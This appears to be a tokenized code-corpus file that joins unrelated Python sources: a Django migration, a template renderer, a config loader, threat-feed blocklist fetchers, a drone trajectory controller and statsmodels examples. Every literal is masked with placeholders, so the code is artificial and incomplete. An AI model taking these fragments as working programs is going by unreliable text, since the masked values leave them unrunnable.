<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT:label>' , <EOL> name = '<STR_LIT:value>' , <EOL> field = models . CharField ( max_length = <NUM_LIT:255> , null = True , verbose_name = b'<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
<s> from stackdio . server . settings . base import * <EOL> REST_FRAMEWORK [ '<STR_LIT>' ] = '<STR_LIT>' </s>
<s> import logging <EOL> import os <EOL> import shutil <EOL> import yaml <EOL> from stackstrap . jinja import JinjaInterface <EOL> class ProjectException ( Exception ) : <EOL> pass <EOL> class Project ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . log = logging . getLogger ( "<STR_LIT>" ) <EOL> self . name = name <EOL> self . short_name = self . name <EOL> def create ( self , template ) : <EOL> if os . path . exists ( self . name ) : <EOL> raise ProjectException ( <EOL> "<STR_LIT>" . format ( <EOL> name = self . name <EOL> ) ) <EOL> if not template . validated : <EOL> template . validate ( ) <EOL> self . log . info ( <EOL> ( <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" <EOL> ) . format ( <EOL> name = self . name , <EOL> template = template . name <EOL> ) ) <EOL> template . copy_to ( self . name ) <EOL> render_context = { <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT>' : self , <EOL> '<STR_LIT>' : template , <EOL> } <EOL> jinja = JinjaInterface ( <EOL> globals = render_context , <EOL> file_loader_paths = [ os . path . abspath ( self . name ) ] <EOL> ) <EOL> def path ( * parts ) : <EOL> return os . path . abspath ( os . path . join ( self . name , * parts ) ) <EOL> def render_in_place ( * parts ) : <EOL> source = path ( * parts ) <EOL> data = unicode ( open ( source ) . read ( ) , "<STR_LIT:utf8>" ) <EOL> with open ( source , '<STR_LIT:w>' ) as f : <EOL> f . write ( jinja . render_string ( data ) ) <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> metadata = yaml . load ( jinja . render_file ( '<STR_LIT>' ) ) <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> cleanup_paths = metadata . get ( "<STR_LIT>" , [ ] ) <EOL> for p in cleanup_paths : <EOL> self . log . debug ( p ) <EOL> cleanup_path = path ( p ) <EOL> if os . path . isdir ( cleanup_path ) : <EOL> shutil . rmtree ( cleanup_path ) <EOL> elif os . path . exists ( cleanup_path ) : <EOL> os . remove ( cleanup_path ) <EOL> else : <EOL> self . log . error ( "<STR_LIT>" % cleanup_path ) <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> file_template_paths = metadata . get ( "<STR_LIT>" , [ ] ) <EOL> for p in file_template_paths : <EOL> self . log . debug ( p ) <EOL> render_in_place ( p ) <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> path_templates = metadata . get ( "<STR_LIT>" , [ ] ) <EOL> for path_template in path_templates : <EOL> for orig_path in path_template : <EOL> self . log . debug ( <EOL> "<STR_LIT>" % ( orig_path , path_template [ orig_path ] ) <EOL> ) <EOL> os . rename ( path ( orig_path ) , <EOL> path ( path_template [ orig_path ] ) ) <EOL> self . log . info ( "<STR_LIT>" . format ( <EOL> name = self . name <EOL> ) ) </s>
<s> import six <EOL> from . import ConfigSource <EOL> import inspect <EOL> class PyFile ( ConfigSource ) : <EOL> def __init__ ( self , pyfilename = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( PyFile , self ) . __init__ ( ** kwargs ) <EOL> self . source = Subsection ( ) <EOL> if pyfilename : <EOL> with open ( pyfilename ) as fp : <EOL> pycode = compile ( fp . read ( ) , pyfilename , '<STR_LIT>' ) <EOL> six . exec_ ( pycode , globals ( ) , self . source ) <EOL> elif kwargs . get ( '<STR_LIT>' ) : <EOL> self . source = kwargs [ '<STR_LIT>' ] <EOL> def has ( self , key ) : <EOL> return key in self . source and not isinstance ( key , Subsection ) <EOL> def get ( self , key ) : <EOL> return self . source . get ( key ) <EOL> def keys ( self ) : <EOL> for key , val in self . source . items ( ) : <EOL> if not ( isinstance ( val , Subsection ) or <EOL> inspect . ismodule ( val ) or <EOL> inspect . isfunction ( val ) or <EOL> val . __class__ . __module__ in ( '<STR_LIT>' ) ) : <EOL> yield key <EOL> def subsections ( self ) : <EOL> return [ key for key in self . source . keys ( ) if isinstance ( self . source [ key ] , Subsection ) ] <EOL> def subsection ( self , key ) : <EOL> return PyFile ( pyfilename = None , dict = self . source . get ( key ) ) <EOL> def set ( self , key , value ) : <EOL> return ValueError ( "<STR_LIT>" ) <EOL> def typed ( self , key ) : <EOL> return self . has ( key ) <EOL> class Subsection ( dict ) : <EOL> def __setattr__ ( self , key , value ) : <EOL> self [ key ] = value <EOL> def __getattr__ ( self , key ) : <EOL> return self [ key ] </s>
<s> """<STR_LIT>""" <EOL> from core . common import retrieve_content <EOL> __url__ = "<STR_LIT>" <EOL> __check__ = "<STR_LIT>" <EOL> __reference__ = "<STR_LIT>" <EOL> def fetch ( ) : <EOL> retval = { } <EOL> content = retrieve_content ( __url__ ) <EOL> if __check__ in content : <EOL> for line in content . split ( '<STR_LIT:\n>' ) : <EOL> line = line . strip ( ) <EOL> if not line or line . startswith ( '<STR_LIT:#>' ) or '<STR_LIT:.>' not in line or "<STR_LIT>" in line : <EOL> continue <EOL> line = line . lower ( ) <EOL> if "<STR_LIT>" in line : <EOL> info = "<STR_LIT>" <EOL> elif "<STR_LIT>" in line : <EOL> info = "<STR_LIT>" <EOL> elif any ( _ in line for _ in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> info = "<STR_LIT>" <EOL> else : <EOL> info = "<STR_LIT>" <EOL> retval [ line . split ( "<STR_LIT:U+002C>" ) [ <NUM_LIT:0> ] ] = ( info , __reference__ ) <EOL> return retval </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from core . common import retrieve_content <EOL> __url__ = "<STR_LIT>" <EOL> __check__ = "<STR_LIT>" <EOL> __info__ = "<STR_LIT>" <EOL> __reference__ = "<STR_LIT>" <EOL> def fetch ( ) : <EOL> retval = { } <EOL> content = retrieve_content ( __url__ ) <EOL> if __check__ in content : <EOL> for match in re . finditer ( r"<STR_LIT>" , content ) : <EOL> retval [ match . group ( <NUM_LIT:1> ) ] = ( __info__ , __reference__ ) <EOL> return retval </s>
<s> """<STR_LIT>""" <EOL> from core . common import retrieve_content <EOL> __url__ = "<STR_LIT>" <EOL> __check__ = "<STR_LIT>" <EOL> __info__ = "<STR_LIT>" <EOL> __reference__ = "<STR_LIT>" <EOL> def fetch ( ) : <EOL> retval = { } <EOL> content = retrieve_content ( __url__ ) <EOL> if __check__ in content : <EOL> for line in content . split ( '<STR_LIT:\n>' ) : <EOL> line = line . strip ( ) <EOL> if not line or line . startswith ( '<STR_LIT:#>' ) : <EOL> continue <EOL> retval [ line ] = ( __info__ , __reference__ ) <EOL> return retval </s>
<s> import time <EOL> import os , sys , inspect <EOL> from pylab import * <EOL> import numpy <EOL> import scipy . interpolate <EOL> from droneapi . lib import APIException , Vehicle , Attitude , Location , GPSInfo , VehicleMode , Mission , Parameters , Command , CommandSequence <EOL> from pymavlink import mavutil <EOL> cmd_subfolder = os . path . realpath ( os . path . abspath ( os . path . join ( os . path . split ( inspect . getfile ( inspect . currentframe ( ) ) ) [ <NUM_LIT:0> ] , "<STR_LIT>" ) ) ) <EOL> if cmd_subfolder not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , cmd_subfolder ) <EOL> import trajectoryAPI <EOL> import coord_system <EOL> TAKEOFF_HEIGHT = <NUM_LIT> <EOL> DISTANCE_LIMIT_LOOK_AT_METERS = <NUM_LIT:1.0> <EOL> DISTANCE_LIMIT_LOOK_FROM_METERS = <NUM_LIT:1.0> <EOL> def init_splinefollow ( drone ) : <EOL> drone . states = { <EOL> '<STR_LIT>' : _state_waiting , <EOL> '<STR_LIT>' : _state_flyToStart , <EOL> '<STR_LIT>' : _state_flySpline , <EOL> } <EOL> drone . lastLookFromPoint = None <EOL> drone . lastLookAtPoint = None <EOL> drone . altitudeOffset = <NUM_LIT:0> <EOL> drone . current_location = None <EOL> drone . vehicle . add_attribute_observer ( '<STR_LIT:location>' , drone . location_callback ) <EOL> def setSpline ( drone , data ) : <EOL> lookAtN = data [ '<STR_LIT>' ] <EOL> lookAtE = data [ '<STR_LIT>' ] <EOL> lookAtD = data [ '<STR_LIT>' ] <EOL> lookFromN = data [ '<STR_LIT>' ] <EOL> lookFromE = data [ '<STR_LIT>' ] <EOL> lookFromD = data [ '<STR_LIT>' ] <EOL> drone . P_lookFromNED_spline = c_ [ lookFromN , lookFromE , lookFromD ] <EOL> drone . T_lookFromNED_spline = c_ [ data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ] <EOL> drone . P_lookFromNED_ease = c_ [ array ( data [ '<STR_LIT>' ] ) ] <EOL> drone . T_lookFromNED_ease = c_ [ array ( data [ '<STR_LIT>' ] ) ] <EOL> drone . P_lookAtNED_spline = c_ [ lookAtN , lookAtE , lookAtD ] <EOL> drone . T_lookAtNED_spline = c_ [ data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ] <EOL> drone . P_lookAtNED_ease = c_ [ array ( data [ '<STR_LIT>' ] ) ] <EOL> drone . T_lookAtNED_ease = c_ [ array ( data [ '<STR_LIT>' ] ) ] <EOL> drone . startAltitude = data [ '<STR_LIT>' ] <EOL> drone . lastTime = data [ '<STR_LIT>' ] ; <EOL> drone . refLLH = array ( [ data [ '<STR_LIT>' ] [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] ) <EOL> def newTrajectory ( drone , data ) : <EOL> setSpline ( drone , data ) <EOL> drone . lastLookFromPoint = None <EOL> drone . lastLookAtPoint = None <EOL> drone . altitudeOffset = <NUM_LIT:0> <EOL> drone . vehicle . add_attribute_observer ( '<STR_LIT:location>' , drone . location_callback ) <EOL> configureSpline ( drone ) <EOL> def changeCurrentTrajectory ( drone , data ) : <EOL> setSpline ( drone , data ) <EOL> configureSpline ( drone ) <EOL> def _stateTransition ( drone , newState ) : <EOL> print "<STR_LIT>" % ( drone . STATE , newState ) <EOL> drone . currentStateTime = time . time ( ) <EOL> drone . STATE = newState <EOL> def start ( drone ) : <EOL> if not drone . vehicle . armed : <EOL> print "<STR_LIT>" <EOL> drone . vehicle . armed = True <EOL> drone . vehicle . flush ( ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> print "<STR_LIT>" <EOL> drone . vehicle . mode = VehicleMode ( "<STR_LIT>" ) <EOL> drone . vehicle . flush ( ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> TAKEOFF_HEIGHT = drone . refLLH [ <NUM_LIT:2> ] - drone . altitudeOffset <EOL> print "<STR_LIT>" % TAKEOFF_HEIGHT <EOL> drone . vehicle . commands . takeoff ( TAKEOFF_HEIGHT ) <EOL> drone . vehicle . flush ( ) <EOL> while drone . vehicle . location . alt < TAKEOFF_HEIGHT - <NUM_LIT:1> : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> print "<STR_LIT>" <EOL> drone . vehicle . mode = VehicleMode ( "<STR_LIT>" ) <EOL> drone . vehicle . flush ( ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> _stateTransition ( drone , '<STR_LIT>' ) <EOL> def _state_waiting ( drone , elapsed , dt ) : <EOL> drone . flightFinished ( ) <EOL> return <EOL> def _state_flyToStart ( drone , elapsed , dt ) : <EOL> l = drone . vehicle . location <EOL> if l is None : <EOL> return <EOL> lookFromStartLLH = coord_system . ned2llh ( drone . P_lookFromNED_spline [ <NUM_LIT:0> ] , drone . refLLH ) <EOL> lookAtStartLLH = coord_system . ned2llh ( drone . P_lookAtNED_spline [ <NUM_LIT:0> ] , drone . refLLH ) <EOL> lookFromStartLLH [ <NUM_LIT:2> ] = lookFromStartLLH [ <NUM_LIT:2> ] - drone . altitudeOffset <EOL> lookAtStartLLH [ <NUM_LIT:2> ] = lookFromStartLLH [ <NUM_LIT:2> ] - drone . altitudeOffset <EOL> distanceToStart = coord_system . get_distance_llh ( lookFromStartLLH , numpy . array ( [ l . lat , l . lon , l . alt ] ) ) <EOL> print "<STR_LIT>" % distanceToStart <EOL> if distanceToStart > <NUM_LIT> or np . linalg . norm ( drone . vehicle . velocity ) > <NUM_LIT:0.5> : <EOL> sendLookFrom ( drone , lookFromStartLLH ) <EOL> sendLookAt ( drone , lookAtStartLLH ) <EOL> else : <EOL> return _stateTransition ( drone , '<STR_LIT>' ) <EOL> def _state_flySpline ( drone , elapsed , dt ) : <EOL> if elapsed > drone . lastTime : <EOL> return _stateTransition ( drone , '<STR_LIT>' ) <EOL> t_lookAt = drone . time_to_lookAt ( elapsed ) <EOL> t_lookFrom = drone . time_to_lookFrom ( elapsed ) <EOL> lookFromPointNED , TF , dTF = trajectoryAPI . _evaluate_spatial_spline ( drone . C_lookFrom_spline , drone . T_lookFrom_spline , drone . sd_lookFrom_spline , T_eval = np . array ( [ [ t_lookFrom , t_lookFrom , t_lookFrom ] ] ) ) <EOL> lookAtPointNED , TA , dTA = trajectoryAPI . _evaluate_spatial_spline ( drone . C_lookAt_spline , drone . T_lookAt_spline , drone . sd_lookAt_spline , T_eval = np . array ( [ [ t_lookAt , t_lookAt , t_lookAt ] ] ) ) <EOL> lookFromPoint = coord_system . ned2llh ( lookFromPointNED [ <NUM_LIT:0> ] , drone . refLLH ) <EOL> lookAtPoint = coord_system . ned2llh ( lookAtPointNED [ <NUM_LIT:0> ] , drone . refLLH ) <EOL> lookFromPoint [ <NUM_LIT:2> ] = lookFromPoint [ <NUM_LIT:2> ] - drone . altitudeOffset <EOL> lookAtPoint [ <NUM_LIT:2> ] = lookAtPoint [ <NUM_LIT:2> ] - drone . altitudeOffset <EOL> sendLookFrom ( drone , lookFromPoint ) <EOL> if drone . lastLookAtPoint == None or coord_system . get_distance_llh ( drone . lastLookAtPoint , lookAtPoint ) > DISTANCE_LIMIT_LOOK_AT_METERS : <EOL> drone . lastLookAtPoint = lookAtPoint <EOL> sendLookAt ( drone , lookAtPoint ) <EOL> def armed_callback ( drone , armed ) : <EOL> print "<STR_LIT>" % armed <EOL> def configureSpline ( drone ) : <EOL> C_lookFromNED_spline , T_lookFrom2_spline , sd_lF = trajectoryAPI . _get_spatial_spline_coefficients ( drone . P_lookFromNED_spline , drone . T_lookFromNED_spline ) <EOL> C_lookAtNED_spline , T_lookAt2_spline , sd_lA = trajectoryAPI . _get_spatial_spline_coefficients ( drone . P_lookAtNED_spline , drone . T_lookAtNED_spline ) <EOL> T_linspace_norm_lookAt , T_user_progress_lookAt , P_user_progress_lookAt , ref_llh1 = trajectoryAPI . reparameterize_spline ( drone . P_lookAtNED_spline , drone . T_lookAtNED_spline , drone . P_lookAtNED_ease , drone . T_lookAtNED_ease ) <EOL> T_linspace_norm_cameraPose , T_user_progress_lookFrom , P_user_progress_lookFrom , ref_llh2 = trajectoryAPI . reparameterize_spline ( drone . P_lookFromNED_spline , drone . T_lookFromNED_spline , drone . P_lookFromNED_ease , drone . T_lookFromNED_ease ) <EOL> timeMaxT = drone . lastTime <EOL> lookAtMaxT = drone . T_lookAtNED_spline [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> lookFromMaxT = drone . T_lookFromNED_spline [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> drone . altitudeOffset = drone . startAltitude <EOL> drone . C_lookFrom_spline = C_lookFromNED_spline <EOL> drone . T_lookFrom_spline = drone . T_lookFromNED_spline <EOL> drone . sd_lookFrom_spline = sd_lF <EOL> drone . C_lookAt_spline = C_lookAtNED_spline <EOL> drone . T_lookAt_spline = drone . T_lookAtNED_spline <EOL> drone . sd_lookAt_spline = sd_lA <EOL> drone . reparameterizedTime = T_linspace_norm_lookAt * timeMaxT <EOL> drone . lookAtReparameterizedT = T_user_progress_lookAt * lookAtMaxT <EOL> drone . lookFromReparameterizedT = T_user_progress_lookFrom * lookFromMaxT <EOL> drone . time_to_lookFrom = scipy . interpolate . interp1d ( drone . reparameterizedTime , drone . lookFromReparameterizedT ) <EOL> drone . time_to_lookAt = scipy . interpolate . interp1d ( drone . reparameterizedTime , drone . lookAtReparameterizedT ) <EOL> def sendLookAt ( drone , llh , vel = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) : <EOL> msg = drone . vehicle . message_factory . command_long_encode ( <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <EOL> mavutil . mavlink . MAV_CMD_DO_SET_ROI , <EOL> <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <EOL> llh [ <NUM_LIT:0> ] , <EOL> llh [ <NUM_LIT:1> ] , <EOL> llh [ <NUM_LIT:2> ] <EOL> ) <EOL> drone . vehicle . send_mavlink ( msg ) <EOL> def sendLookFrom ( drone , llh , vel = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) : <EOL> print "<STR_LIT>" <EOL> dest = Location ( llh [ <NUM_LIT:0> ] , llh [ <NUM_LIT:1> ] , llh [ <NUM_LIT:2> ] , is_relative = False ) <EOL> drone . vehicle . commands . goto ( dest ) </s>
<s> COMMON = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT:200> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> } <EOL> READ_PAGE_DATA = [ { '<STR_LIT:url>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:200> } , <EOL> { '<STR_LIT:url>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT> } , <EOL> { '<STR_LIT:url>' : '<STR_LIT>' , '<STR_LIT>' : False } ] <EOL> INPUT_WORDS = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ u'<STR_LIT>' , <EOL> u'<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ u'<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ u'<STR_LIT>' , <EOL> u'<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> u'<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' ] , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ u'<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ u'<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ u'<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> } <EOL> MISSPELLED_WORDS = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ u'<STR_LIT>' <EOL> '<STR_LIT>' ] <EOL> } <EOL> } </s>
<s> import abc <EOL> import collections <EOL> import logging <EOL> import sys <EOL> from six . moves import http_client <EOL> import repositorytools <EOL> logger = logging . getLogger ( sys . argv [ <NUM_LIT:0> ] ) <EOL> def configure_logging ( debug ) : <EOL> if debug : <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> http_client . HTTPConnection . debuglevel = <NUM_LIT:1> <EOL> requests_log = logging . getLogger ( "<STR_LIT>" ) <EOL> requests_log . setLevel ( logging . INFO ) <EOL> requests_log . propagate = True <EOL> else : <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> class CLI ( collections . Callable ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = abc . ABCMeta <EOL> @ abc . abstractmethod <EOL> def _get_parser ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __init__ ( self ) : <EOL> self . parser = self . _get_parser ( ) <EOL> self . parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT:store_true>" , dest = "<STR_LIT>" , default = False , <EOL> help = "<STR_LIT>" ) <EOL> self . repository = None <EOL> def run ( self , args = None ) : <EOL> args_namespace = self . parser . parse_args ( args ) <EOL> configure_logging ( args_namespace . debug ) <EOL> used_args = args or sys . argv [ <NUM_LIT:1> : ] <EOL> logger . info ( '<STR_LIT>' , sys . argv [ <NUM_LIT:0> ] , str ( used_args ) ) <EOL> """<STR_LIT>""" <EOL> self . repository = repositorytools . repository_client_factory ( ) <EOL> return args_namespace . func ( args_namespace ) <EOL> def __call__ ( self , * args ) : <EOL> return self . run ( * args ) </s>
<s> """<STR_LIT>""" <EOL> from scipy import stats <EOL> from matplotlib import pyplot as plt <EOL> import statsmodels . api as sm <EOL> data = sm . datasets . longley . load ( ) <EOL> data . exog = sm . add_constant ( data . exog , prepend = True ) <EOL> mod_fit = sm . OLS ( data . endog , data . exog ) . fit ( ) <EOL> res = mod_fit . resid <EOL> left = - <NUM_LIT> <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> sm . graphics . qqplot ( res , ax = ax ) <EOL> top = ax . get_ylim ( ) [ <NUM_LIT:1> ] * <NUM_LIT> <EOL> txt = ax . text ( left , top , '<STR_LIT>' , verticalalignment = '<STR_LIT>' ) <EOL> txt . set_bbox ( dict ( facecolor = '<STR_LIT:k>' , alpha = <NUM_LIT:0.1> ) ) <EOL> ax = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> sm . graphics . qqplot ( res , line = '<STR_LIT:s>' , ax = ax ) <EOL> top = ax . get_ylim ( ) [ <NUM_LIT:1> ] * <NUM_LIT> <EOL> txt = ax . text ( left , top , "<STR_LIT>" , verticalalignment = '<STR_LIT>' ) <EOL> txt . set_bbox ( dict ( facecolor = '<STR_LIT:k>' , alpha = <NUM_LIT:0.1> ) ) <EOL> ax = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> sm . graphics . qqplot ( res , line = '<STR_LIT>' , fit = True , ax = ax ) <EOL> ax . set_xlim ( - <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> top = ax . get_ylim ( ) [ <NUM_LIT:1> ] * <NUM_LIT> <EOL> txt = ax . text ( left , top , "<STR_LIT>" , verticalalignment = '<STR_LIT>' ) <EOL> txt . set_bbox ( dict ( facecolor = '<STR_LIT:k>' , alpha = <NUM_LIT:0.1> ) ) <EOL> ax = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> ) <EOL> sm . graphics . qqplot ( res , dist = stats . t , line = '<STR_LIT>' , fit = True , ax = ax ) <EOL> ax . set_xlim ( - <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> top = ax . get_ylim ( ) [ <NUM_LIT:1> ] * <NUM_LIT> <EOL> txt = ax . text ( left , top , "<STR_LIT>" , <EOL> verticalalignment = '<STR_LIT>' ) <EOL> txt . set_bbox ( dict ( facecolor = '<STR_LIT:k>' , alpha = <NUM_LIT:0.1> ) ) <EOL> fig . tight_layout ( ) <EOL> plt . gcf ( ) <EOL> import numpy as np <EOL> x = np . random . normal ( loc = <NUM_LIT> , scale = <NUM_LIT> , size = <NUM_LIT> ) <EOL> y = np . random . normal ( loc = <NUM_LIT> , scale = <NUM_LIT> , size = <NUM_LIT> ) <EOL> pp_x = sm . ProbPlot ( x , fit = True ) <EOL> pp_y = sm . ProbPlot ( y , fit = True ) <EOL> fig2 = pp_x . probplot ( exceed = True ) <EOL> fig3 = pp_x . qqplot ( other = pp_y , line = '<STR_LIT>' ) <EOL> fig4 = pp_x . ppplot ( other = pp_y , line = '<STR_LIT>' ) </s>
<s> from __future__ import print_function <EOL> import statsmodels . api as sm <EOL> import statsmodels . formula . api as smf <EOL> star98 = sm . datasets . star98 . load_pandas ( ) . data <EOL> formula = '<STR_LIT>' <EOL> dta = star98 [ [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ] <EOL> endog = dta [ '<STR_LIT>' ] / ( dta [ '<STR_LIT>' ] + dta . pop ( '<STR_LIT>' ) ) <EOL> del dta [ '<STR_LIT>' ] <EOL> dta [ '<STR_LIT>' ] = endog <EOL> mod1 = smf . glm ( formula = formula , data = dta , family = sm . families . Binomial ( ) ) . fit ( ) <EOL> mod1 . summary ( ) <EOL> def double_it ( x ) : <EOL> return <NUM_LIT:2> * x <EOL> formula = '<STR_LIT>' <EOL> mod2 = smf . glm ( formula = formula , data = dta , family = sm . families . Binomial ( ) ) . fit ( ) <EOL> mod2 . summary ( ) <EOL> print ( mod1 . params [ <NUM_LIT:1> ] ) <EOL> print ( mod2 . params [ <NUM_LIT:1> ] * <NUM_LIT:2> ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from scipy . optimize import fmin_slsqp <EOL> import statsmodels . base . l1_solvers_common as l1_solvers_common <EOL> def fit_l1_slsqp ( <EOL> f , score , start_params , args , kwargs , disp = False , maxiter = <NUM_LIT:1000> , <EOL> callback = None , retall = False , full_output = False , hess = None ) : <EOL> """<STR_LIT>""" <EOL> start_params = np . array ( start_params ) . ravel ( '<STR_LIT:F>' ) <EOL> k_params = len ( start_params ) <EOL> x0 = np . append ( start_params , np . fabs ( start_params ) ) <EOL> alpha = np . array ( kwargs [ '<STR_LIT>' ] ) . ravel ( '<STR_LIT:F>' ) <EOL> alpha = alpha * np . ones ( k_params ) <EOL> assert alpha . min ( ) >= <NUM_LIT:0> <EOL> disp_slsqp = _get_disp_slsqp ( disp , retall ) <EOL> acc = kwargs . setdefault ( '<STR_LIT>' , <NUM_LIT> ) <EOL> func = lambda x_full : _objective_func ( f , x_full , k_params , alpha , * args ) <EOL> f_ieqcons_wrap = lambda x_full : _f_ieqcons ( x_full , k_params ) <EOL> fprime_wrap = lambda x_full : _fprime ( score , x_full , k_params , alpha ) <EOL> fprime_ieqcons_wrap = lambda x_full : _fprime_ieqcons ( x_full , k_params ) <EOL> results = fmin_slsqp ( <EOL> func , x0 , f_ieqcons = f_ieqcons_wrap , fprime = fprime_wrap , acc = acc , <EOL> iter = maxiter , disp = disp_slsqp , full_output = full_output , <EOL> fprime_ieqcons = fprime_ieqcons_wrap ) <EOL> params = np . asarray ( results [ <NUM_LIT:0> ] [ : k_params ] ) <EOL> qc_tol = kwargs [ '<STR_LIT>' ] <EOL> qc_verbose = kwargs [ '<STR_LIT>' ] <EOL> passed = l1_solvers_common . qc_results ( <EOL> params , alpha , score , qc_tol , qc_verbose ) <EOL> trim_mode = kwargs [ '<STR_LIT>' ] <EOL> size_trim_tol = kwargs [ '<STR_LIT>' ] <EOL> auto_trim_tol = kwargs [ '<STR_LIT>' ] <EOL> params , trimmed = l1_solvers_common . do_trim_params ( <EOL> params , k_params , alpha , score , passed , trim_mode , size_trim_tol , <EOL> auto_trim_tol ) <EOL> if full_output : <EOL> x_full , fx , its , imode , smode = results <EOL> fopt = func ( np . asarray ( x_full ) ) <EOL> converged = '<STR_LIT:True>' if imode == <NUM_LIT:0> else smode <EOL> iterations = its <EOL> gopt = float ( '<STR_LIT>' ) <EOL> hopt = float ( '<STR_LIT>' ) <EOL> retvals = { <EOL> '<STR_LIT>' : fopt , '<STR_LIT>' : converged , '<STR_LIT>' : iterations , <EOL> '<STR_LIT>' : gopt , '<STR_LIT>' : hopt , '<STR_LIT>' : trimmed } <EOL> if full_output : <EOL> return params , retvals <EOL> else : <EOL> return params <EOL> def _get_disp_slsqp ( disp , retall ) : <EOL> if disp or retall : <EOL> if disp : <EOL> disp_slsqp = <NUM_LIT:1> <EOL> if retall : <EOL> disp_slsqp = <NUM_LIT:2> <EOL> else : <EOL> disp_slsqp = <NUM_LIT:0> <EOL> return disp_slsqp <EOL> def _objective_func ( f , x_full , k_params , alpha , * args ) : <EOL> """<STR_LIT>""" <EOL> x_params = x_full [ : k_params ] <EOL> x_added = x_full [ k_params : ] <EOL> return f ( x_params , * args ) + ( alpha * x_added ) . sum ( ) <EOL> def _fprime ( score , x_full , k_params , alpha ) : <EOL> """<STR_LIT>""" <EOL> x_params = x_full [ : k_params ] <EOL> return np . append ( score ( x_params ) , alpha ) <EOL> def _f_ieqcons ( x_full , k_params ) : <EOL> """<STR_LIT>""" <EOL> x_params = x_full [ : k_params ] <EOL> x_added = x_full [ k_params : ] <EOL> return np . append ( x_params + x_added , x_added - x_params ) <EOL> def _fprime_ieqcons ( x_full , k_params ) : <EOL> """<STR_LIT>""" <EOL> I = np . eye ( k_params ) <EOL> A = np . concatenate ( ( I , I ) , axis = <NUM_LIT:1> ) <EOL> B = np . concatenate ( ( - I , I ) , axis = <NUM_LIT:1> ) <EOL> C = np . concatenate ( ( A , B ) , axis = <NUM_LIT:0> ) <EOL> return C </s>
